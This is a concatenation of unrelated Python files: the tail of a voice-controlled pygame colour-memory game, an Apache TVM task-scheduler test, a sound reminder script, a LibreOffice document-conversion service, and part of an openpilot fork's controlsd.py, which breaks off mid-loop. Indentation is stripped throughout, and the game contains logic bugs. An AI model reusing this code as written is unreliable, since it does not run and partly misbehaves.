instruction6 = myfont.render('This will continue until you ', 1 ,options.YELLOW, options.BLACK)
instruction7 = myfont.render('reach level 20 and you win the game!', 1 ,options.YELLOW, options.BLACK)
# put the label object on the screen at specified point
self.screen.blit(instruction, (20, 50))
self.screen.blit(instruction2, (20, 100))
self.screen.blit(instruction3, (20, 150))
self.screen.blit(instruction4, (20, 200))
self.screen.blit(instruction5, (20, 250))
self.screen.blit(instruction6, (20, 300))
self.screen.blit(instruction7, (20, 350))
# Blit everything to the screen
pg.display.flip()
time.sleep(10)
#When the player loses this function is called
def lose(self):
quit()
#When user clicks, it means they are ready to input through microphone and say pattern
def getButtonClicked(self):
#The length of the pattern is the same as the level
level = len(options.COLORPATTERN)
#To let programmer know that we are in this function
if debug == True:
print('getting voice input')
print('Welcome to level: ' +str(level))
#Reset voice input to an empty list
voiceinput = []
stop = False
while stop == False:
try:
#When debug is set to false, use the microphone as user input
if debug == False:
with sr.Microphone(0) as mic:
# mic = speech_recognition.Microphone(0)
r.energy_threshold = 3000
r.dynamic_energy_threshold = True
print('Tell me the pattern')
audio = r.listen(mic)
text = r.recognize_google(audio)
print("You said: ", text)
#Debug is used to automate level increment logic. Much quicker than using voice.
elif debug == True:
text = options.COLORPATTERN
print("You said: ", text)
# if level is over 20 then the player wins
if level == 21:
print("Game over, you win!")
#When the user is on level 1, compare the two elements in the seperate lists
elif level == 1:
print('checking the color logic')
for i in text:
print(i)
for c in options.COLORPATTERN:
print(c)
if i == c:
print('we have a match!')
else:
print('There is not a match')
self.lose()
break
stop = True
#If the user says and in between each color then sepearate the colors and put into list
elif 'and' in text and level > 1:
voiceinput = text.split('and')
voiceinput = text
level += 1
stop = True
#If the user does not say and in between colors then use this logic
elif level > 1 and text == options.COLORPATTERN:
print('doing more stuffs')
level += 1
stop = True
#Game win logic
elif level == 21:
print('you win!')
except sr.UnknownValueError as e:
print(e)
return voiceinput
#Set the class "game" as "g"
g = game()
#done will stop the game when = False
done = True
#Main game loop, while done == True the game will run
while done == True:
#Start a new game to initialize the game
g.new()
g.start_game()
#When the user tries to quit, sets done = False and ends game
for event in pg.event.get():
if event.type == pg.QUIT:
done = False
#quit game
pg.quit()
|
test_auto_scheduler_task_scheduler.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Test task scheduler """
import tempfile
import multiprocessing
import numpy as np
import tvm
import tvm.testing
from tvm import auto_scheduler
from test_auto_scheduler_common import matmul_auto_scheduler_test
@tvm.testing.requires_llvm
def test_task_scheduler_round_robin():
tasks = []
for n in [2, 4, 8]:
tasks.append(
auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(n, n, n), target="llvm"
)
)
with tempfile.NamedTemporaryFile() as fp:
log_file = fp.name
num_trials_per_task = 2
# Tune all tasks
measure_ctx = auto_scheduler.LocalRPCMeasureContext()
tune_option = auto_scheduler.TuningOptions(
num_measure_trials=num_trials_per_task * len(tasks),
runner=measure_ctx.runner,
num_measures_per_round=1,
measure_callbacks=[auto_scheduler.RecordToFile(log_file)],
)
task_scheduler = auto_scheduler.TaskScheduler(tasks, strategy="round-robin", callbacks=[])
task_scheduler.tune(tune_option, search_policy="sketch.random")
# Check the result of round robin
counters = {}
for task in tasks:
counters[task.workload_key] = 0
for inp, _ in auto_scheduler.load_records(log_file):
counters[inp.task.workload_key] += 1
for task in tasks:
assert counters[task.workload_key] == num_trials_per_task
# test continuous tuning (restoring the status)
task_scheduler = auto_scheduler.TaskScheduler(
tasks, strategy="round-robin", load_log_file=log_file, callbacks=[]
)
tune_option = auto_scheduler.TuningOptions(
num_measure_trials=len(tasks),
num_measures_per_round=1,
)
task_scheduler.tune(tune_option, search_policy="sketch.random")
del measure_ctx
@tvm.testing.requires_llvm
def task_scheduler_round_robin_spawn():
assert multiprocessing.get_start_method(False) == "spawn"
test_task_scheduler_round_robin()
@tvm.testing.requires_llvm
def test_task_scheduler_round_robin_spawn():
ctx = multiprocessing.get_context("spawn")
p = ctx.Process(target=task_scheduler_round_robin_spawn)
p.start()
p.join()
@tvm.testing.requires_llvm
def test_task_scheduler_gradient():
tasks = []
for n in [2, 4]:
tasks.append(
auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(n, n, n), target="llvm"
)
)
def objective_func(costs):
return costs[0]
with tempfile.NamedTemporaryFile() as fp:
log_file = fp.name
n_trials = 5
# Tune all tasks
measure_ctx = auto_scheduler.LocalRPCMeasureContext()
tune_option = auto_scheduler.TuningOptions(
num_measure_trials=n_trials,
runner=measure_ctx.runner,
num_measures_per_round=1,
measure_callbacks=[auto_scheduler.RecordToFile(log_file)],
)
task_scheduler = auto_scheduler.TaskScheduler(
tasks, objective_func=objective_func, callbacks=[]
)
# Forcely rewrite the initial values.
# This can make this test more stable on the slow CI machines
task_scheduler.best_costs = np.array([1e2, 1e-8])
task_scheduler.tune(tune_option, search_policy="sketch.random")
# Check the allocation results
counters = {}
for task in tasks:
counters[task.workload_key] = 0
for inp, _ in auto_scheduler.load_records(log_file):
counters[inp.task.workload_key] += 1
assert counters[tasks[0].workload_key] == n_trials - 1
assert counters[tasks[1].workload_key] == 1
del measure_ctx
if __name__ == "__main__":
test_task_scheduler_round_robin()
test_task_scheduler_round_robin_spawn()
test_task_scheduler_gradient()
|
reminder.py
|
import time
import threading
import os
import playsound
import random
import json
ftime=0
ptime=0
start = -1
with open('./config.json') as f:
config = json.load(f)
TIME = config['time']*60
a_files=os.listdir("./Audio_Files/")
def input_func():
global ftime,ptime,start
startevent.set()
print(f"Welcome to ReminderBot! 0 to Pause and -1 to exit! Ill Remind you every {TIME/60} minutes")
while(True):
s = int(input())
if s == 1:
if not pauseevent.is_set():
continue
print("Reminder Resumed! Select 0 to pause and -1 to exit")
ftime=ftime+time.time()-ptime
pauseevent.clear() # Resume Remindabot
elif s==0:
if pauseevent.is_set():
continue
ptime = time.time()
print(f"Reminder Paused! {(ptime-start)/60} mins elapsed (Select 1 to Resume and -1 to exit)")
pauseevent.set()
elif s==-1:
killevent.set()
break
print("Program Exited")
def rem_func():
global ftime,start
while True:
if killevent.is_set(): # Check if thread should be killed
break
if pauseevent.is_set(): # Check for Pause Condition
continue
if startevent.is_set(): # Check for initial Start condition of timer.
start = time.time()
startevent.clear()
if not startevent.is_set(): # If startevent is false, Check for time match.
if start!=-1:
cur = time.time()
if cur-start-ftime>=TIME:
print(f"{TIME/60} mins has elapsed")
playsound.playsound(f"./Audio_Files/{random.choice(a_files)}",True)
startevent.set()
ftime=0
pauseevent = threading.Event()
killevent = threading.Event()
startevent = threading.Event()
t1 = threading.Thread(target=input_func)
t2 = threading.Thread(target=rem_func)
t1.start()
t2.start()
|
convert.py
|
import os
import sys
import asyncio
import subprocess
import os.path
import time
import threading
import tempfile
import logging
import mimetypes
import pprint
from functools import partial
from io import BytesIO
from concurrent.futures import ThreadPoolExecutor
from tempfile import gettempdir
import uno
import unohelper
from com.sun.star.beans import PropertyValue
from com.sun.star.lang import DisposedException, IllegalArgumentException
from com.sun.star.connection import NoConnectException
from com.sun.star.io import IOException, XOutputStream
from com.sun.star.script import CannotConvertException
from com.sun.star.uno import RuntimeException
from config import MAX_MEMORY, MAX_CONCURRENCY
# A pool of workers to perform conversions.
EXECUTOR = ThreadPoolExecutor(max_workers=MAX_CONCURRENCY)
SOFFICE = None
LOGGER = logging.getLogger(__name__)
LOGGER.addHandler(logging.NullHandler())
DEFAULT_FILTER = "com.sun.star.text.GenericTextDocument"
FILTERS = {
"pdf": {
"com.sun.star.text.GenericTextDocument": "writer_pdf_Export",
"com.sun.star.sheet.SpreadsheetDocument": "calc_pdf_Export",
"com.sun.star.text.WebDocument": "writer_web_pdf_Export",
"com.sun.star.presentation.PresentationDocument": "impress_pdf_Export",
"com.sun.star.drawing.DrawingDocument": "draw_pdf_Export",
},
"png": {
"com.sun.star.text.GenericTextDocument": "writer_png_Export",
"com.sun.star.sheet.SpreadsheetDocument": "calc_png_Export",
"com.sun.star.text.WebDocument": "writer_web_png_Export",
"com.sun.star.presentation.PresentationDocument": "impress_png_Export",
"com.sun.star.drawing.DrawingDocument": "draw_png_Export",
}
}
IMPORT_FILTERS = {
'.bib': 'BibTeX_Writer',
'.bmp': 'draw_bmp_Export',
'.csv': 'Text - txt - csv (StarCalc)',
'.dbf': 'dBase',
'.dif': 'DIF',
'.doc': 'MS Word 97',
'.docx': 'Office Open XML Text',
'.emf': 'draw_emf_Export',
'.eps': 'draw_eps_Export',
'.fodg': 'OpenDocument Drawing Flat XML',
'.fodp': 'OpenDocument Presentation Flat XML',
'.fods': 'OpenDocument Spreadsheet Flat XML',
'.fodt': 'OpenDocument Text Flat XML',
'.gif': 'draw_gif_Export',
'.html': 'HTML (StarWriter)',
'.jpg': 'draw_jpg_Export',
'.ltx': 'LaTeX_Writer',
'.met': 'draw_met_Export',
'.odd': 'draw8',
'.odg': 'impress8_draw',
'.odp': 'impress8',
'.ods': 'calc8',
'.odt': 'writer8',
'.otg': 'draw8_template',
'.otp': 'impress8_template',
'.ots': 'calc8_template',
'.ott': 'writer8_template',
'.pbm': 'draw_pbm_Export',
'.pct': 'draw_pct_Export',
'.pdb': 'AportisDoc Palm DB',
'.pdf': 'writer_pdf_Export',
'.pgm': 'draw_pgm_Export',
'.png': 'draw_png_Export',
'.pot': 'MS PowerPoint 97 Vorlage',
'.potm': 'Impress MS PowerPoint 2007 XML Template',
'.ppm': 'draw_ppm_Export',
'.pps': 'MS PowerPoint 97 Autoplay',
'.ppt': 'MS PowerPoint 97',
'.pptx': 'Impress MS PowerPoint 2007 XML',
'.psw': 'PocketWord File',
'.pwp': 'placeware_Export',
'.pxl': 'Pocket Excel',
'.ras': 'draw_ras_Export',
'.rtf': 'Rich Text Format',
'.sda': 'StarDraw 5.0 (StarImpress)',
'.sdc': 'StarCalc 5.0',
'.sdd': 'StarImpress 5.0',
'.sdw': 'StarWriter 5.0',
'.slk': 'SYLK',
'.stc': 'calc_StarOffice_XML_Calc_Template',
'.std': 'draw_StarOffice_XML_Draw_Template',
'.sti': 'impress_StarOffice_XML_Impress_Template',
'.stw': 'writer_StarOffice_XML_Writer_Template',
'.svg': 'draw_svg_Export',
'.svm': 'draw_svm_Export',
'.swf': 'draw_flash_Export',
'.sxc': 'StarOffice XML (Calc)',
'.sxd': 'StarOffice XML (Draw)',
'.sxi': 'StarOffice XML (Impress)',
'.sxw': 'StarOffice XML (Writer)',
'.tiff': 'draw_tif_Export',
'.txt': 'Text',
'.uop': 'UOF presentation',
'.uos': 'UOF spreadsheet',
'.uot': 'UOF text',
'.vor': 'StarWriter 5.0 Vorlage/Template',
'.wmf': 'draw_wmf_Export',
'.wps': 'MS_Works',
'.xhtml': 'XHTML Calc File',
'.xls': 'MS Excel 97',
'.xlsx': 'Calc MS Excel 2007 XML',
'.xlt': 'MS Excel 97 Vorlage/Template',
'.xml': 'DocBook File',
'.xpm': 'draw_xpm_Export'
}
def property(name, value):
prop = PropertyValue()
prop.Name = name
prop.Value = value
return prop
def property_tuple(d):
properties = []
for k, v in d.items():
properties.append(property(k, v))
return tuple(properties)
def input_props(content_type):
props = {
"Hidden": True,
"MacroExecutionMode": 0,
"ReadOnly": True,
"Overwrite": True,
"OpenNewView": True,
"StartPresentation": False,
"RepairPackage": False,
}
extension = mimetypes.guess_extension(content_type)
if extension:
filter = IMPORT_FILTERS.get(extension)
if filter:
props["FilterName"] = filter
return property_tuple(props)
def output_props(doc, format, pages=None):
filters = FILTERS[format]
filter = filters[DEFAULT_FILTER]
for k, v in filters.items():
if doc.supportsService(k):
filter = v
break
props = property_tuple({
"FilterName": filter,
"Overwrite": True,
"ReduceImageResolution": True,
"MaxImageResolution": 300,
})
if format == 'pdf':
props += (property("SelectPdfVersion", 1),)
if pages:
page_range = tuple([
PropertyValue('PageRange', 0, '%i-%i' % pages, 0)
])
page_prop = uno.Any("[]com.sun.star.beans.PropertyValue", page_range)
props += tuple([
PropertyValue("FilterData", 0, page_prop, 0)
])
return props
class OutputStream(unohelper.Base, XOutputStream):
"""
Simple class to receive output from soffice.
"""
def __init__(self):
self.f = BytesIO()
self.closed = False
def closeOutput(self):
self.closed = True
def writeBytes(self, seq):
if self.closed:
raise IOError('write to closed stream')
try:
self.f.write(seq.value)
except Exception as e:
LOGGER.exception(e)
raise
def getvalue(self):
return self.f.getvalue()
def flush(self):
pass
class Connection(object):
"""
Manages connection to soffice.
This class handles all the details of the conversion.
"""
def __init__(self):
self.context = uno.getComponentContext()
self.service_manager = self.context.ServiceManager
resolver = self.service_manager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", self.context)
ctx = resolver.resolve('uno:%s' % SOffice.ADDRESS)
self.desktop = ctx.ServiceManager.createInstanceWithContext(
"com.sun.star.frame.Desktop", ctx)
def input_stream(self, data):
stream = self.service_manager.createInstanceWithContext(
"com.sun.star.io.SequenceInputStream", self.context)
seq = uno.ByteSequence(data)
# NOTE: the call below passes a tuple.
stream.initialize((seq,))
return stream, "private:stream"
def convert(self, format, url=None, data=None, content_type=None, pages=None,
size=None):
# Ulitmately, this is the function called by convert()
in_props = input_props(content_type)
if data:
in_stream, url = self.input_stream(data)
in_props += (property("InputStream", in_stream),)
LOGGER.debug('in_url: %s', url)
LOGGER.debug('in_props: %s', pprint.pformat(in_props))
for i in range(3):
try:
doc = self.desktop.loadComponentFromURL(
url, "_blank", 0, in_props)
break
except Exception as e:
LOGGER.exception(e)
if i == 2:
raise
LOGGER.info('Retrying connection to soffice')
time.sleep(0.5)
out_props = output_props(doc, format, pages)
out_stream = None
# We estimate the output size to be close to the input file size. If it
# is expected to be large, we write to disk.
if size <= MAX_MEMORY:
out_stream = OutputStream()
out_props += (property("OutputStream", out_stream),)
out_url = "private:stream"
else:
_fd, out_url = tempfile.mkstemp(suffix='.%s' % format)
os.close(_fd)
out_url = unohelper.systemPathToFileUrl(out_url)
LOGGER.debug('out_url: %s', out_url)
LOGGER.debug('out_props: %s', pprint.pformat(out_props))
try:
try:
doc.ShowChanges = False
except AttributeError:
pass
try:
doc.refresh()
except AttributeError:
pass
doc.storeToURL(out_url, out_props)
finally:
doc.dispose()
doc.close(True)
if out_stream:
output = BytesIO(out_stream.getvalue())
else:
# NOTE: strip off file://
output = open(out_url[7:], 'rb')
LOGGER.debug('%s as: %s', format, output.__class__)
return output
class SOffice(object):
"""
Execute soffice and monitor process health.
This thread runs soffice, sends it's output to stdout / stderr and
restarts it if necessary.
"""
ADDRESS = "socket,host=localhost,port=2002,tcpNoDelay=1;urp;StarOffice.ComponentContext"
INSTALL_DIR = os.path.join(gettempdir(), "soffice")
COMMAND = [
"/usr/bin/soffice",
"-env:UserInstallation=file:///%s" % INSTALL_DIR,
"-env:JFW_PLUGIN_DO_NOT_CHECK_ACCESSIBILITY=1",
"--nologo",
"--headless",
"--invisible",
"--nocrashreport",
"--nodefault",
"--norestore",
"--safe-mode",
"--accept=%s" % ADDRESS,
]
def __init__(self):
self.p = None
self.t = threading.Thread(target=self._run)
self.t.start()
def _run(self):
while True:
if self.p is None:
LOGGER.info('Starting soffice')
self.p = subprocess.Popen(
SOffice.COMMAND,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
while self.p.poll() is None:
try:
out, err = self.p.communicate(timeout=1.0)
if out:
LOGGER.info('soffice stdout: %s', out)
if err:
LOGGER.info('soffice stderr: %s', err)
except subprocess.TimeoutExpired:
pass
LOGGER.warning('Exited with returncode: %s', self.p.returncode)
time.sleep(1.0)
def _convert(format, *args, **kwargs):
LOGGER.debug('Converting document to %s, arguments...', format)
for i, arg in enumerate(args):
LOGGER.debug('[%i]: %s', i, arg)
for n, v in kwargs.items():
try:
length = len(v)
if length > 100:
v = length
except (TypeError, ValueError):
pass
LOGGER.debug('["%s"]: %s', n, v)
return Connection().convert(format, *args, **kwargs)
async def convert(*args, **kwargs):
loop = asyncio.get_running_loop()
# NOTE: the file argument is removed, our convert() function only handles
# a data buffer or url (which can be a local path).
f = kwargs.pop('file', None)
if f:
# An AsyncSpooledTemporaryFile has a SpooledTemporaryFile as it's
# _file attribute.
if hasattr(f, '_file') and getattr(f._file, '_rolled', None) is False:
# Get a reference to BytesIO.
f = f._file._file
kwargs['data'] = f.getvalue()
LOGGER.debug('Read %i bytes into buffer', kwargs['size'])
else:
kwargs['url'] = unohelper.systemPathToFileUrl(f._file.name)
LOGGER.debug('File is %i bytes', kwargs['size'])
# NOTE: we use an executor here for a few reasons:
# - This call is blocking, so we want it in a background thread. Since it
# is mostly I/O, this should be a good choice.
# - We want to only have one request at a time to soffice. Since we have a
# single threaded executor, we achieve this without extra work.
return await loop.run_in_executor(EXECUTOR, partial(_convert, *args, **kwargs))
# Start the process early.
SOFFICE = SOffice()
|
controlsd.py
|
#!/usr/bin/env python3
import os
import math
import requests
import threading
from numbers import Number
from cereal import car, log
from common.numpy_fast import clip
from common.realtime import sec_since_boot, config_realtime_process, Priority, Ratekeeper, DT_CTRL
from common.profiler import Profiler
from common.params import Params, put_nonblocking
from common.travis_checker import gh_actions
import cereal.messaging as messaging
import selfdrive.crash as crash
from selfdrive.config import Conversions as CV
from selfdrive.version import is_fork_remote
from selfdrive.swaglog import cloudlog
from selfdrive.boardd.boardd import can_list_to_can_capnp
from selfdrive.car.car_helpers import get_car, get_startup_event, get_one_can
from selfdrive.controls.lib.drive_helpers import update_v_cruise, initialize_v_cruise
from selfdrive.controls.lib.drive_helpers import get_lag_adjusted_curvature
from selfdrive.controls.lib.longcontrol import LongControl
from selfdrive.controls.lib.latcontrol_pid import LatControlPID
from selfdrive.controls.lib.latcontrol_indi import LatControlINDI
from selfdrive.controls.lib.latcontrol_lqr import LatControlLQR
from selfdrive.controls.lib.latcontrol_model import LatControlModel
from selfdrive.controls.lib.latcontrol_angle import LatControlAngle
from selfdrive.controls.lib.events import Events, ET
from selfdrive.controls.lib.alertmanager import AlertManager, set_offroad_alert
from selfdrive.controls.lib.vehicle_model import VehicleModel
from selfdrive.locationd.calibrationd import Calibration
from selfdrive.hardware import HARDWARE, TICI, EON
from selfdrive.manager.process_config import managed_processes
from selfdrive.controls.lib.dynamic_follow.df_manager import dfManager
from common.op_params import opParams
SOFT_DISABLE_TIME = 3 # seconds
LDW_MIN_SPEED = 31 * CV.MPH_TO_MS
LANE_DEPARTURE_THRESHOLD = 0.1
STEER_ANGLE_SATURATION_TIMEOUT = 1.0 / DT_CTRL
STEER_ANGLE_SATURATION_THRESHOLD = 2.5 # Degrees
REPLAY = "REPLAY" in os.environ
SIMULATION = "SIMULATION" in os.environ
NOSENSOR = "NOSENSOR" in os.environ
IGNORE_PROCESSES = {"rtshield", "uploader", "deleter", "loggerd", "logmessaged", "tombstoned",
"logcatd", "proclogd", "clocksd", "updated", "timezoned", "manage_athenad"} | \
{k for k, v in managed_processes.items() if not v.enabled}
ACTUATOR_FIELDS = set(car.CarControl.Actuators.schema.fields.keys())
ThermalStatus = log.DeviceState.ThermalStatus
State = log.ControlsState.OpenpilotState
PandaType = log.PandaState.PandaType
Desire = log.LateralPlan.Desire
LaneChangeState = log.LateralPlan.LaneChangeState
LaneChangeDirection = log.LateralPlan.LaneChangeDirection
EventName = car.CarEvent.EventName
ButtonEvent = car.CarState.ButtonEvent
SafetyModel = car.CarParams.SafetyModel
IGNORED_SAFETY_MODES = [SafetyModel.silent, SafetyModel.noOutput]
def log_fingerprint(candidate, timeout=15):
if not gh_actions and is_fork_remote:
try:
requests.get('https://sentry.io', timeout=timeout)
crash.init()
crash.capture_message("fingerprinted {}".format(candidate), level='info')
return
except:
pass
class Controls:
def __init__(self, sm=None, pm=None, can_sock=None):
config_realtime_process(4 if TICI else 3, Priority.CTRL_HIGH)
self.op_params = opParams()
# Setup sockets
self.pm = pm
if self.pm is None:
self.pm = messaging.PubMaster(['sendcan', 'controlsState', 'carState',
'carControl', 'carEvents', 'carParams'])
self.camera_packets = ["roadCameraState", "driverCameraState"]
if TICI:
self.camera_packets.append("wideRoadCameraState")
params = Params()
self.joystick_mode = params.get_bool("JoystickDebugMode")
joystick_packet = ['testJoystick'] if self.joystick_mode else []
self.sm = sm
if self.sm is None:
ignore = ['driverCameraState', 'managerState'] if SIMULATION else None
self.sm = messaging.SubMaster(['deviceState', 'pandaStates', 'peripheralState', 'modelV2', 'liveCalibration',
'driverMonitoringState', 'longitudinalPlan', 'lateralPlan', 'liveLocationKalman',
'managerState', 'liveParameters', 'radarState'] + self.camera_packets + joystick_packet,
ignore_alive=ignore, ignore_avg_freq=['radarState', 'longitudinalPlan'])
self.sm_smiskol = messaging.SubMaster(['radarState', 'dynamicFollowData', 'liveTracks', 'dynamicFollowButton',
'laneSpeed', 'dynamicCameraOffset', 'modelLongButton'])
self.op_params = opParams()
self.df_manager = dfManager()
self.last_model_long = False
self.can_sock = can_sock
if can_sock is None:
can_timeout = None if os.environ.get('NO_CAN_TIMEOUT', False) else 100
self.can_sock = messaging.sub_sock('can', timeout=can_timeout)
if TICI:
self.log_sock = messaging.sub_sock('androidLog')
# wait for one pandaState and one CAN packet
print("Waiting for CAN messages...")
get_one_can(self.can_sock)
self.CI, self.CP, candidate = get_car(self.can_sock, self.pm.sock['sendcan'])
threading.Thread(target=log_fingerprint, args=[candidate]).start()
# read params
self.is_metric = params.get_bool("IsMetric")
self.is_ldw_enabled = params.get_bool("IsLdwEnabled")
community_feature_toggle = params.get_bool("CommunityFeaturesToggle")
openpilot_enabled_toggle = params.get_bool("OpenpilotEnabledToggle")
passive = params.get_bool("Passive") or not openpilot_enabled_toggle
# detect sound card presence and ensure successful init
sounds_available = HARDWARE.get_sound_card_online()
car_recognized = self.CP.carName != 'mock'
controller_available = self.CI.CC is not None and not passive and not self.CP.dashcamOnly
community_feature = self.CP.communityFeature or \
self.CP.fingerprintSource == car.CarParams.FingerprintSource.can
community_feature_disallowed = community_feature and (not community_feature_toggle)
self.read_only = not car_recognized or not controller_available or \
self.CP.dashcamOnly or community_feature_disallowed
if self.read_only:
safety_config = car.CarParams.SafetyConfig.new_message()
safety_config.safetyModel = car.CarParams.SafetyModel.noOutput
self.CP.safetyConfigs = [safety_config]
# Write CarParams for radard
cp_bytes = self.CP.to_bytes()
params.put("CarParams", cp_bytes)
put_nonblocking("CarParamsCache", cp_bytes)
self.CC = car.CarControl.new_message()
self.AM = AlertManager()
self.events = Events()
self.LoC = LongControl(self.CP)
self.VM = VehicleModel(self.CP)
if self.CP.steerControlType == car.CarParams.SteerControlType.angle:
self.LaC = LatControlAngle(self.CP)
elif self.CP.lateralTuning.which() == 'pid':
self.LaC = LatControlPID(self.CP, self.CI)
elif self.CP.lateralTuning.which() == 'indi':
self.LaC = LatControlINDI(self.CP)
elif self.CP.lateralTuning.which() == 'lqr':
self.LaC = LatControlLQR(self.CP)
elif self.CP.lateralTuning.which() == 'model':
self.LaC = LatControlModel(self.CP)
self.initialized = False
self.state = State.disabled
self.enabled = False
self.active = False
self.can_rcv_error = False
self.soft_disable_timer = 0
self.v_cruise_kph = 255
self.v_cruise_kph_last = 0
self.mismatch_counter = 0
self.cruise_mismatch_counter = 0
self.can_rcv_error_counter = 0
self.last_blinker_frame = 0
self.saturated_count = 0
self.distance_traveled = 0
self.last_functional_fan_frame = 0
self.events_prev = []
self.current_alert_types = [ET.PERMANENT]
self.logged_comm_issue = False
self.button_timers = {ButtonEvent.Type.decelCruise: 0, ButtonEvent.Type.accelCruise: 0}
self.last_actuators = car.CarControl.Actuators.new_message()
self.lat_delay_offset = 0.0
# TODO: no longer necessary, aside from process replay
self.sm['liveParameters'].valid = True
self.startup_event = get_startup_event(car_recognized, controller_available, len(self.CP.carFw) > 0, self.CP)
if not sounds_available:
self.events.add(EventName.soundsUnavailable, static=True)
if community_feature_disallowed and car_recognized and not self.CP.dashcamOnly:
self.events.add(EventName.communityFeatureDisallowed, static=True)
if not car_recognized:
self.events.add(EventName.carUnrecognized, static=True)
if len(self.CP.carFw) > 0:
set_offroad_alert("Offroad_CarUnrecognized", True)
else:
set_offroad_alert("Offroad_NoFirmware", True)
elif self.read_only:
self.events.add(EventName.dashcamMode, static=True)
elif self.joystick_mode:
self.events.add(EventName.joystickDebug, static=True)
self.startup_event = None
# controlsd is driven by can recv, expected at 100Hz
self.rk = Ratekeeper(100, print_delay_threshold=None)
self.prof = Profiler(False) # off by default
def update_events(self, CS):
"""Compute carEvents from carState"""
self.events.clear()
self.events.add_from_msg(CS.events)
self.events.add_from_msg(self.sm['driverMonitoringState'].events)
# Handle startup event
if self.startup_event is not None:
self.events.add(self.startup_event)
self.startup_event = None
# Don't add any more events if not initialized
if not self.initialized:
self.events.add(EventName.controlsInitializing)
return
# Create events for battery, temperature, disk space, and memory
if EON and (self.sm['peripheralState'].pandaType != PandaType.uno) and \
self.sm['deviceState'].batteryPercent < 1 and self.sm['deviceState'].chargingError:
# at zero percent battery, while discharging, OP should not allowed
self.events.add(EventName.lowBattery)
if self.sm['deviceState'].thermalStatus >= ThermalStatus.red:
self.events.add(EventName.overheat)
if self.sm['deviceState'].freeSpacePercent < 7 and not SIMULATION:
# under 7% of space free no enable allowed
self.events.add(EventName.outOfSpace)
# TODO: make tici threshold the same
if self.sm['deviceState'].memoryUsagePercent > (90 if TICI else 65) and not SIMULATION:
self.events.add(EventName.lowMemory)
# TODO: enable this once loggerd CPU usage is more reasonable
#cpus = list(self.sm['deviceState'].cpuUsagePercent)[:(-1 if EON else None)]
#if max(cpus, default=0) > 95 and not SIMULATION:
# self.events.add(EventName.highCpuUsage)
# Alert if fan isn't spinning for 5 seconds
if self.sm['peripheralState'].pandaType in [PandaType.uno, PandaType.dos]:
if self.sm['peripheralState'].fanSpeedRpm == 0 and self.sm['deviceState'].fanSpeedPercentDesired > 50:
if (self.sm.frame - self.last_functional_fan_frame) * DT_CTRL > 5.0:
self.events.add(EventName.fanMalfunction)
else:
self.last_functional_fan_frame = self.sm.frame
# Handle calibration status
cal_status = self.sm['liveCalibration'].calStatus
if cal_status != Calibration.CALIBRATED:
if cal_status == Calibration.UNCALIBRATED:
self.events.add(EventName.calibrationIncomplete)
else:
self.events.add(EventName.calibrationInvalid)
# Handle lane change
if self.sm['lateralPlan'].laneChangeState == LaneChangeState.preLaneChange:
direction = self.sm['lateralPlan'].laneChangeDirection
if (CS.leftBlindspot and direction == LaneChangeDirection.left) or \
(CS.rightBlindspot and direction == LaneChangeDirection.right):
self.events.add(EventName.laneChangeBlocked)
else:
if direction == LaneChangeDirection.left:
self.events.add(EventName.preLaneChangeLeft)
else:
self.events.add(EventName.preLaneChangeRight)
elif self.sm['lateralPlan'].laneChangeState in [LaneChangeState.laneChangeStarting,
LaneChangeState.laneChangeFinishing]:
self.events.add(EventName.laneChange)
if not CS.canValid:
self.events.add(EventName.canError)
for i, pandaState in enumerate(self.sm['pandaStates']):
# All pandas must match the list of safetyConfigs, and if outside this list, must be silent or noOutput
if i < len(self.CP.safetyConfigs):
safety_mismatch = pandaState.safetyModel != self.CP.safetyConfigs[i].safetyModel or pandaState.safetyParam != self.CP.safetyConfigs[i].safetyParam
else:
safety_mismatch = pandaState.safetyModel not in IGNORED_SAFETY_MODES
if safety_mismatch or self.mismatch_counter >= 200:
self.events.add(EventName.controlsMismatch)
if log.PandaState.FaultType.relayMalfunction in pandaState.faults:
self.events.add(EventName.relayMalfunction)
# Check for HW or system issues
if len(self.sm['radarState'].radarErrors):
self.events.add(EventName.radarFault)
elif not self.sm.valid["pandaStates"]:
self.events.add(EventName.usbError)
elif not self.sm.all_alive_and_valid() or self.can_rcv_error:
self.events.add(EventName.commIssue)
if not self.logged_comm_issue:
invalid = [s for s, valid in self.sm.valid.items() if not valid]
not_alive = [s for s, alive in self.sm.alive.items() if not alive]
cloudlog.event("commIssue", invalid=invalid, not_alive=not_alive)
self.logged_comm_issue = True
else:
self.logged_comm_issue = False
if not self.sm['liveParameters'].valid:
self.events.add(EventName.vehicleModelInvalid)
if not self.sm['lateralPlan'].mpcSolutionValid:
self.events.add(EventName.plannerError)
if not self.sm['liveLocationKalman'].sensorsOK and not NOSENSOR:
if self.sm.frame > 5 / DT_CTRL: # Give locationd some time to receive all the inputs
self.events.add(EventName.sensorDataInvalid)
if not self.sm['liveLocationKalman'].posenetOK:
self.events.add(EventName.posenetInvalid)
if not self.sm['liveLocationKalman'].deviceStable:
self.events.add(EventName.deviceFalling)
if not REPLAY:
# Check for mismatch between openpilot and car's PCM
cruise_mismatch = CS.cruiseState.enabled and (not self.enabled or not self.CP.pcmCruise)
self.cruise_mismatch_counter = self.cruise_mismatch_counter + 1 if cruise_mismatch else 0
if self.cruise_mismatch_counter > int(3. / DT_CTRL):
self.events.add(EventName.cruiseMismatch)
# Check for FCW
stock_long_is_braking = self.enabled and not self.CP.openpilotLongitudinalControl and CS.aEgo < -1.5
model_fcw = self.sm['modelV2'].meta.hardBrakePredicted and not CS.brakePressed and not stock_long_is_braking
planner_fcw = self.sm['longitudinalPlan'].fcw and self.enabled
if planner_fcw or model_fcw:
self.events.add(EventName.fcw)
if TICI:
logs = messaging.drain_sock(self.log_sock, wait_for_one=False)
messages = []
for m in logs:
try:
messages.append(m.androidLog.message)
except UnicodeDecodeError:
pass
for err in ["ERROR_CRC", "ERROR_ECC", "ERROR_STREAM_UNDERFLOW", "APPLY FAILED"]:
for m in messages:
